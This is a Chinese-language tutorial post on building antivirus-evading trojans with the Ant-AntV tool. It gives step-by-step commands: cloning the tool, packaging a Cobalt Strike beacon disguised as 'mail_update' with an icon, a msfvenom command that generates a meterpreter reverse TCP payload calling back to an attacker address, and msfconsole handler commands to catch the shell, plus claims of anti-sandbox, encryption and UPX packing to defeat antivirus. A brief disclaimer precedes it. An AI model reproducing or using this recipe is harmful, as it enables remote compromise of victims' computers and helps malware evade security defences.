注意:本文仅供学习和研究,了解技术和原理的前提下,请更好地保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。
环境配置
在本教程中,我们将介绍一款在Cs和Msf中相当出色的免杀工具。为了进行操作,我们需要以下环境:
- 操作系统:Kali Linux
- Python 版本:3.8
安装步骤
git clone https://github.com/shellfeel/Ant-AntV cd Ant-AntV pip install -r requirements.txt
生成Shellcode
在这里,我们以Cs为例生成.bin
格式的Shellcode。将生成的Shellcode命名为beacon.bin
,并放置在当前目录的bean_raw
路径下。如果需要为程序添加图标,将图标命名为mail_update.ico
(可通过修改gen_trojan.py
的第48行来更改程序名),然后放入resource
目录。执行以下命令来打包程序:
python gen_trojan.py
打包完成后,效果如下:
使用Msf生成Shell
使用msfvenom
生成Windows x64平台的meterpreter_reverse_tcp
Shell,配置如下:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin
通过类似的方式配置Msf,执行以下命令:
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.123.33 set LPORT 5555 exploit
免杀效果
(在此特别感谢群内小伙伴的测试!😘😘😘)
Cs成功上线
总结
该工具采用随机密钥(混淆加密、shellcode加密)策略,每次生成的程序都是全新的,从而避免被杀软散列标记导致全部失效。支持反沙箱逻辑、混淆和upx压缩。
暂无评论内容